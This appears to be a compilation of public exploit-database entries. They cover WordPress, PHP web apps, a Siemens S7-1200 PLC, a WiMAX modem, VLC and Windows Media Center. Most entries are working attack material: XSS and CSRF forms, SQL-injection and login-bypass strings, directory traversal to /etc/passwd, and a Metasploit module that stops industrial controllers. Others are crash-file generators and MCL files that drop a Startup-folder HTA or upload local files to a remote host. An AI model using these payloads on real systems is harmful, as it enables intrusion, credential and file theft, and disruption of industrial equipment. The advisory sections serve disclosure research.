# Category: webapps
1. Description
Inside almost all wp_ajax function there is no privilege check.
File: admin-management-xtended\general-functions.php
add_action( 'wp_ajax_ame_toggle_visibility', 'ame_toggle_visibility' );
add_action( 'wp_ajax_ame_set_date', 'ame_set_date' );
add_action( 'wp_ajax_ame_save_title', 'ame_save_title' );
add_action( 'wp_ajax_ame_save_slug', 'ame_save_slug' );
add_action( 'wp_ajax_ame_slug_edit', 'ame_slug_edit' );
add_action( 'wp_ajax_ame_save_order', 'ame_save_order' );
add_action( 'wp_ajax_ame_toggle_orderoptions', 'ame_toggle_orderoptions' );
add_action( 'wp_ajax_ame_toggle_showinvisposts', 'ame_toggle_showinvisposts' );
add_action( 'wp_ajax_ame_get_pageorder', 'ame_get_pageorder' );
add_action( 'wp_ajax_ame_ajax_save_categories', 'ame_ajax_save_categories' );
add_action( 'wp_ajax_ame_ajax_get_categories', 'ame_ajax_get_categories' );
add_action( 'wp_ajax_ame_ajax_set_commentstatus', 'ame_ajax_set_commentstatus' );
add_action( 'wp_ajax_ame_ajax_save_tags', 'ame_ajax_save_tags' );
add_action( 'wp_ajax_ame_ajax_toggle_imageset', 'ame_ajax_toggle_imageset' );
add_action( 'wp_ajax_ame_ajax_save_mediadesc', 'ame_ajax_save_mediadesc' );
add_action( 'wp_ajax_ame_author_edit', 'ame_author_edit' );
add_action( 'wp_ajax_ame_save_author', 'ame_save_author' );
add_action( 'wp_ajax_ame_toggle_excludestatus', 'ame_toggle_excludestatus' );
add_action( 'wp_ajax_ame_toggle_sticky', 'ame_toggle_sticky' );
http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register). Then you can change any post title:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_save_title">
Post id: <input type="text" name="category_id" value="1">
Post title: <input type="text" name="new_title" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>
XSS will be visible on post page:
http://wordpress-url/?p=1
Or change media excerpt:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_ajax_save_mediadesc">
Post id: <input type="text" name="postid" value="1">
Excerpt: <input type="text" name="new_mediadesc" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>
XSS will be visible for admin:
http://wordpress-url/wp-admin/upload.php
3. Solution:
Update to version 2.4.0.1
#Exploit Title : ECommerceMajor SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
1. Description
"prodid" field in productdtl.php is not properly sanitized, that leads to
SQL Injection Vulnerability.
2. Vulnerable Code:
line 14 to 28
<?php
$getallproduct="select * from purchase where id=$_GET[prodid] order by id
desc";
$getallproductresult=mysql_query($getallproduct);
$getallproducttotal=mysql_num_rows($getallproductresult);
3. POC
http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI
# Exploit Title: Simatic S7 1200 CPU command module
# Date: 15-12-2015
# Exploit Author: Nguyen Manh Hung
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1214C
# CVE : None
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name'=> 'Simatic S7-1200 CPU START/STOP Module',
'Description' => %q{
Update 2015
The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP.
},
'Author' => 'Nguyen Manh Hung <tdh.mhung@gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'nil' ],
],
'Version' => '$Revision$',
'DisclosureDate' => '11-2015'
))
register_options(
[
Opt::RPORT(102),
OptInt.new('FUNC',[true,'func',1]),
OptString.new('MODE', [true, 'Mode select:
START -- start PLC
STOP -- stop PLC
SCAN -- PLC scanner',"SCAN"]),
], self.class)
end
####################################################################################
def packet()
packets=[ #dua tren TIA portal thay cho hello plc
"\x03\x00\x00\x23\x1e\xe0\x00\x00"+
"\x00\x06\x00\xc1\x02\x06\x00\xc2"+
"\x0f\x53\x49\x4d\x41\x54\x49\x43"+
"\x2d\x52\x4f\x4f\x54\x2d\x45\x53"+
"\xc0\x01\x0a",
#session debug
"\x03\x00\x00\xc0\x02\xf0\x80\x72"+
"\x01\x00\xb1\x31\x00\x00\x04\xca"+
"\x00\x00\x00\x02\x00\x00\x01\x20"+
"\x36\x00\x00\x01\x1d\x00\x04\x00"+
"\x00\x00\x00\x00\xa1\x00\x00\x00"+
"\xd3\x82\x1f\x00\x00\xa3\x81\x69"+
"\x00\x15\x16\x53\x65\x72\x76\x65"+
"\x72\x53\x65\x73\x73\x69\x6f\x6e"+
"\x5f\x43\x43\x39\x43\x33\x39\x33"+
"\x44\xa3\x82\x21\x00\x15\x0b\x31"+
"\x3a\x3a\x3a\x36\x2e\x30\x3a\x3a"+
"\x3a\x12\xa3\x82\x28\x00\x15\x0d"+
"\x4f\x4d\x53\x2b\x20\x44\x65\x62"+
"\x75\x67\x67\x65\x72\xa3\x82\x29"+
"\x00\x15\x00\xa3\x82\x2a\x00\x15"+
"\x00\xa3\x82\x2b\x00\x04\x84\x80"+
"\x80\x80\x00\xa3\x82\x2c\x00\x12"+
"\x11\xe1\xa3\x00\xa3\x82\x2d\x00"+
"\x15\x00\xa1\x00\x00\x00\xd3\x81"+
"\x7f\x00\x00\xa3\x81\x69\x00\x15"+
"\x15\x53\x75\x62\x73\x63\x72\x69"+
"\x70\x74\x69\x6f\x6e\x43\x6f\x6e"+
"\x74\x61\x69\x6e\x65\x72\xa2\xa2"+
"\x00\x00\x00\x00\x72\x01\x00\x00",
######
"\x03\x00\x00\x77\x02\xf0\x80\x72"+#p1
"\x02\x00\x68\x31\x00\x00\x05\x42"+
"\x00\x00\x00\x03\x00\x00\x03\xff"+
"\x34\x00\x00\x03\xff\x01\x01\x82"+
"\x32\x01\x00\x17\x00\x00\x01\x3a"+
"\x82\x3b\x00\x04\x81\x40\x82\x3c"+
"\x00\x04\x81\x40\x82\x3d\x00\x04"+
"\x00\x82\x3e\x00\x04\x84\x80\xc0"+
"\x40\x82\x3f\x00\x15\x00\x82\x40"+
"\x00\x15\x05\x32\x3b"+
"\x35\x34\x34\x82\x41"+
"\x00\x03\x00\x03\x00\x00\x00\x00"+#2
"\x04\xe8\x89\x69\x00\x12\x00\x00"+
"\x00\x00\x89\x6a\x00\x13\x00\x89"+
"\x6b\x00\x04\x00\x00\x00\x00\x00"+
"\x00\x72\x02\x00\x00",
#unknown
"\x03\x00\x00\x07\x02\xf0\x00",
#bat dau qua trinh diag
"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
"\x00\x00\x00\x05\x00\x00\x03\xff"+
"\x34\x00\x00\x00\x01\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x72"+
"\x02\x00\x00",
#tiep tuc diag
"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
"\x00\x00\x00\x06\x00\x00\x03\xff"+
"\x34\x00\x00\x00\x02\x00\x01\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x72"+
"\x02\x00\x00",
#truoc start-stop
"\x03\x00\x00\x42\x02\xf0\x80"+
"\x72\x02\x00\x33\x31\x00\x00\x04"+
"\xfc\x00\x00\x00\x07\x00\x00\x03"+
"\xff\x36\x00\x00\x00\x34\x02\x91"+
"\x3d\x9b\x1e\x00\x00\x04\xe8\x89"+
"\x69\x00\x12\x00\x00\x00\x00\x89"+
"\x6a\x00\x13\x00\x89\x6b\x00\x04"+
"\x00\x00\x00\x00\x00\x00\x00\x72"+
"\x02\x00\x00",
#start
"\x03\x00\x00\x43\x02\xf0\x80"+
"\x72\x02\x00\x34\x31\x00\x00\x04"+
"\xf2\x00\x00\x00\x08\x00\x00\x03"+
"\xff\x36\x00\x00\x00\x34\x01\x90"+
"\x77\x00\x08\x03\x00\x00\x04\xe8"+
"\x89\x69\x00\x12\x00\x00\x00\x00"+
"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
"\x04\x00\x00\x00\x00\x00\x00\x00"+
"\x72\x02\x00\x00",
#stop
"\x03\x00\x00\x43\x02\xf0\x80"+
"\x72\x02\x00\x34\x31\x00\x00\x04"+
"\xf2\x00\x00\x00\x08\x00\x00\x03"+
"\xff\x36\x00\x00\x00\x34\x01\x90"+
"\x77\x00\x08\x01\x00\x00\x04\xe8"+
"\x89\x69\x00\x12\x00\x00\x00\x00"+
"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
"\x04\x00\x00\x00\x00\x00\x00\x00"+
"\x72\x02\x00\x00",
]
return packets
end
#############################################################################
def start_PLC(scr)
print_good "mode select: START"
sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
sock.get_once()
sleep(0.05)
sock.put(packet[7].gsub("\xff",[scr].pack("c")))#send hello plc
#sock.get_once()
dt=sock.get_once(-1, sock.def_read_timeout)
if dt.length.to_i == 30
print_good "PLC---->RUN"
else
a= dt.to_s.gsub(/[\x80-\xff]/," ")
print_error a.to_s.gsub(/[\x00-\x30]/," ")
end
end
#############################################################################
def stop_PLC(scr)
print_good "mode select: STOP"
sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
sock.get_once()
sleep(0.05)
sock.put(packet[8].gsub("\xff",[scr].pack("c")))#send hello plc
dt=sock.get_once(-1, sock.def_read_timeout)
if dt.length.to_i == 30
print_good "PLC---->STOP"
else
a= dt.to_s.gsub(/[\x80-\xff]/," ")
print_error a.to_s.gsub(/[\x00-\x30]/," ")
end
end
#############################################################################
def PLC_SCAN(ip)
sock.put(packet[0])#send hello plc
sock.get_once()
sleep(0.05)
sock.put(packet[1])#xin 1 session debug
dt=sock.get_once(-1, sock.def_read_timeout)
sock.put(packet[3])#send hello plc
sock.get_once()
arr=dt.split(/;/)
print_good "#{ip.to_s}: #{arr[2].to_s} : #{arr[3][0..3].to_s}"
end
#############################################################################
def run_host(ip)
mode=datastore['MODE']
func=datastore['FUNC']
connect()
if mode !="scan" && mode!="SCAN"
sock.put(packet[0])#send hello plc
sock.get_once()
sleep(0.05)
sock.put(packet[1])#xin 1 session debug
dt=sock.get_once(-1, sock.def_read_timeout)
sock.put(packet[3])#send hello plc
sock.get_once()
arr=dt.split(/;/)
print_good "#{arr[2].to_s} : #{arr[3][0..3].to_s}"
data=dt.unpack("C*")
a= (data[24]).to_i
b= (data[26]).to_i
scr=a|128
scr1=b|128
#print_line scr.to_s
if arr.length.to_i ==5 #neu lay duoc session
session_i= arr[4][0..4].each_byte.map { |dt| '\x%02x' % dt.to_i }.join
pac=packet[2].gsub("\xff",[scr].pack("c"))
sock.put(pac.gsub("\x35\x34\x34\x82\x41", arr[4][0..4]))
end
sock.put(packet[3])#send uknown packet to plc
sock.get_once()
case mode
when "START" , "start"
start_PLC(scr)
when "STOP" , "stop"
stop_PLC(scr)
else
print_error("Invalid MODE")
end
else
PLC_SCAN(ip)
end
disconnect()
end
end
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
[CSRF with XSS Exploit]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://http://www.example.com/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Åžeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version
|~Software : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword : "Sitenizi dizine eklemek için tıklayın !"
################## ++ CSRF Admin Password Change Exploit ++ ######################################
<html>
<body>
<form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
<input type="hidden" name="kullaniciadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
################# ++ SQL Injection with Authentication Bypass ++###########################################
http://[TARGET]/admin
ID: 'or' 1=1
PW : 'or' 1=1
############################################################
source: https://www.securityfocus.com/bid/64564/info
WordPress is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
WordPress 2.0.11 is vulnerable.
http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1
source: https://www.securityfocus.com/bid/64543/info
Apple Safari for Windows is affected by a security-bypass weakness.
Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in conducting phishing attacks.
http://example.com:/@/xsser.me/
### Exploit Title: WIMAX MT711x - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.seowonintech.co.kr/en/
### Version: V_3_11_14_9_CPE
### Tested on: Kali-Linux
I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.
### Details of MT711x model:
Version Information:
Build Time 2014.08.18-11:49
CPE Ver 1.0.9
MTK FW Ver EX_REL_MT711x_V_3_11_14_9_CPE
Serial Number IRMB1351C9200-0001044
I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition 2)wget 3)Nmap
### POCs of the modem:
#Get the WIFI settings>>
wget -c "http://server/cgi-bin/multi_wifi.cgi"
#Get Wimax credentials>>
wget -c "http://server/cgi-bin/wccm_wimax_setting.cgi"
#Enable and Disable connections to modem (as default those are ENABLED)>>
http://server/cgi-bin/remote.cgi
#Ping a system (useful for launching (D)DOS attack)>>
POST /cgi-bin/diagnostic.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/diagnostic.cgi
Cookie: login=; login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
select_mode_ping=on&ping_ipaddr=4.2.2.4&ping_count=10&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&trace_report_only_hidden=0&action=Apply&html_view=ping
#Change the password of ADMIN account:
POST /cgi-bin/pw.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/pw.cgi
Cookie: login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
isp_name=mobinnet&pw_set_select=admin&passPass=admin&passCfirm=admin&action=Apply
### Conclusion:
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)To obtain the control of similar modem(MT711x) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).
At the end, I am thankful and I wait for your response.
// source: https://www.securityfocus.com/bid/64623/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main()
{
FILE *f;
f = fopen("dos.nsv", "w");
fputs("\x4e\x53\x56\x66", f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fclose(f);
return 0;
}
//use code for creating malicious file
edit: works on 2.0.1.0
# Title : GoAutoDial CE 3.3 Multiple SQL injections, Command Injection
# Date : 06/12/2015
# Author : R-73eN
# Tested on : goautodial-32bit-ce-3.3-final
# Software : http://goautodial.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
Vulnerabilities
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
call_report_export.php
Line 131
$LOGip = getenv("REMOTE_ADDR");
$LOGbrowser = getenv("HTTP_USER_AGENT");
$LOGscript_name = getenv("SCRIPT_NAME");
$LOGserver_name = getenv("SERVER_NAME");
$LOGserver_port = getenv("SERVER_PORT");
$LOGrequest_uri = getenv("REQUEST_URI");
$LOGhttp_referer = getenv("HTTP_REFERER");
if (preg_match("/443/i",$LOGserver_port)) {$HTTPprotocol = 'https://';}
else {$HTTPprotocol = 'http://';}
if (($LOGserver_port == '80') or ($LOGserver_port == '443') ) {$LOGserver_port='';}
else {$LOGserver_port = ":$LOGserver_port";}
$LOGfull_url = "$HTTPprotocol$LOGserver_name$LOGserver_port$LOGrequest_uri";
$stmt="INSERT INTO vicidial_report_log set event_date=NOW(), user='$PHP_AUTH_USER', ip_address='$LOGip', report_name='$report_name', browser='$LOGbrowser', referer='$LOGhttp_referer', notes='$LOGserver_name:$LOGserver_port $LOGscript_name |$campaign[0], $query_date, $end_date|', url='$LOGfull_url';";
The $LOGip , $LOGbrowser etc are not sanitized are passed directly to a sql query.
For example passing a crafted User-Agent header will cause a sql injection attack.
The following files were vulnerable for the same vulnerability.
call_report_export.php
voice_lab.php
user_status.php
user_stats.php
timeclock_status.php
timeclock_report.php
sph_report.php
group_hourly_stats.php
realtime_report.php
lead_report_export.php
list_download.php
fcstats.php
call_report_export.php
AST_VICIDIAL_ingrouplist.php
AST_VICIDIAL_hopperlist.php
AST_usergroup_login_report.php
AST_team_performance_detail.php
AST_VDADstats.php
AST_server_performance.php
campaign_debug.php
AST_LIST_UPDATEstats.php
AST_LISTS_campaign_stats.php
AST_OUTBOUNDsummary_interval.php
AST_IVRstats.php
AST_IVRfilter.php
AST_inbound_daily_report.php
and in many other files.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
web_form_forward.php
Line 15
if (isset($_GET["user"])) {$user=$_GET["user"];}
require("dbconnect.php");
$stmt="SELECT full_name from vicidial_users where user='$user';";
$rslt=mysql_query($stmt, $link);
$row=mysql_fetch_row($rslt);
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
QM_live_monitor.php
If the QueueMetrics is enabled the following file is vulnerable to sql injection
. LINE 31
if (isset($_GET["call"])){$call=$_GET["call"];}
elseif (isset($_POST["call"])) {$call=$_POST["call"];}
.
.
.
$stmt = "SELECT user,server_ip,conf_exten,comments FROM vicidial_live_agents where callerid='$call';";
As u can see the $call parameter is not sanitized which leads to Sql injection.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
call_log_display.php SQL injection
there is no validation on the $server_ip and $session_name an
if( (strlen($server_ip)<6) or (!isset($server_ip)) or ( (strlen($session_name)<12) or (!isset($session_name)) ) )
.
.
$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
.
.
The if statement can be bypassed very easily, we need to provide an input more then 6 characters and more then 12 characters.
Then the parameters get passed ot the sql query and we have sql injection again.
The same vulnerability was found to.
conf_extn_check.php
inbound_popup.php
live_extn_check.php
manager_send.php
park_calls_display.php
active_list_refresh.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCRIPT_multirecording_AJAX.php SQL injection
.
.
.
if (isset($_GET["campaign"])) {$campaign=$_GET["campaign"];}
elseif (isset($_POST["campaign"])) {$campaign=$_POST["campaign"];}
.
.
.
$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";
Again $campaign is not sanetized
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
recording_lookup.php SQL injection
.
.
(isset($_GET["QUERY_recid"])) {$QUERY_recid=$_GET["QUERY_recid"];}
elseif (isset($_POST["QUERY_recid"])) {$QUERY_recid=$_POST["QUERY_recid"];}
.
.
$stmt="select recording_id,lead_id,user,filename,location,start_time,length_in_sec from recording_log where filename LIKE \"%$QUERY_recid%\" order by recording_id desc LIMIT 1;";
$QUERY_recid is not sanitized.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
vicidial_sales_viewer.php SQL injection , Command Injection
the $dcampaign parameter is not sanitized.
.
.
if (isset($_GET["dcampaign"])) {$dcampaign=$_GET["dcampaign"];}
elseif (isset($_POST["dcampaign"])) {$dcampaign=$_POST["dcampaign"];}
.
.
$stmt="select campaign_id, campaign_name from vicidial_campaigns where campaign_id='$dcampaign'"; // Here we have the sql injection
.
.
passthru("$WeBServeRRooT/vicidial/spreadsheet_sales_viewer.pl $list_ids $sales_number $timestamp $forc $now $dcampaign"); // Command injection
https://www.infogen.al/ - Infogen AL
// source: https://www.securityfocus.com/bid/64626/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
# Exploit Title: VLC v. 1.1.11 .eac3 DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main(int argc, char *argv[])
{
FILE *f;
f = fopen(argv[1], "r+");
fseek(f, 5, SEEK_SET);
fputc('\x00', f);
fclose(f);
return 0;
}
//code updates eac3 file, can find samples on videolan ftp server
source: https://www.securityfocus.com/bid/64693/info
SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected.
https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)
Software Vendor: Microsoft
Software version : MS Windows Media Center latest version on any Windows OS.
Software Vendor Homepage: http://www.microsoft.com
CVE: CVE-2015-6131
Exploit Author: Eduardo Braun Prado
Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team
date: december 8, 2015
Vulnerability description:
Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files.
exploit code below:
----------- self-exec-1.mcl ------------------------------------
<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>
------------------------------------------------------------
----------self-exec-2.mcl--------------------------------------
<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------
-----Create-recordsetfile.hta --------------
<html><body onload="aa()">
<script language="VBScript">
function aa()
defdir="."
alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"".
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close
end function
</script></body></html>
-------------------------------------------------------------------------------
---------recordsetdata.txt------------------------------------------
<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
1. Advisory Information
Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release
2. Vulnerability Information
Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127
3. Vulnerability Description
The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.
A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser.
4. Vulnerable Packages
Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.
5. Vendor Information, Solutions and Workarounds
Microsoft posted the following Security Bulletin: MS15-134 [2]
6. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.
7. Technical Description / Proof of Concept Code
The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file.
The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server.
Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.
7.1. Proof of Concept
A new file should be created with the name "poc-microsoft.mcl" and with the following content:
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">
function do_upload(fname, data){
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
xmlhttp.send(new Uint8Array(data));
}
function read_local_file(filename){
/* Must use this one, XMLHttpRequest() doesn't allow to read local files */
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", filename, false);
xmlhttp.send();
return xmlhttp.responseBody.toArray();
}
function upload_file(filename){
try{
do_upload(filename, read_local_file(filename));
}catch(e){
alert(filename + " error: " + e);
}
}
upload_file("file:///C:/Windows/System32/calc.exe");
</script>
</body>
</html>
</application>
8. Report Timeline
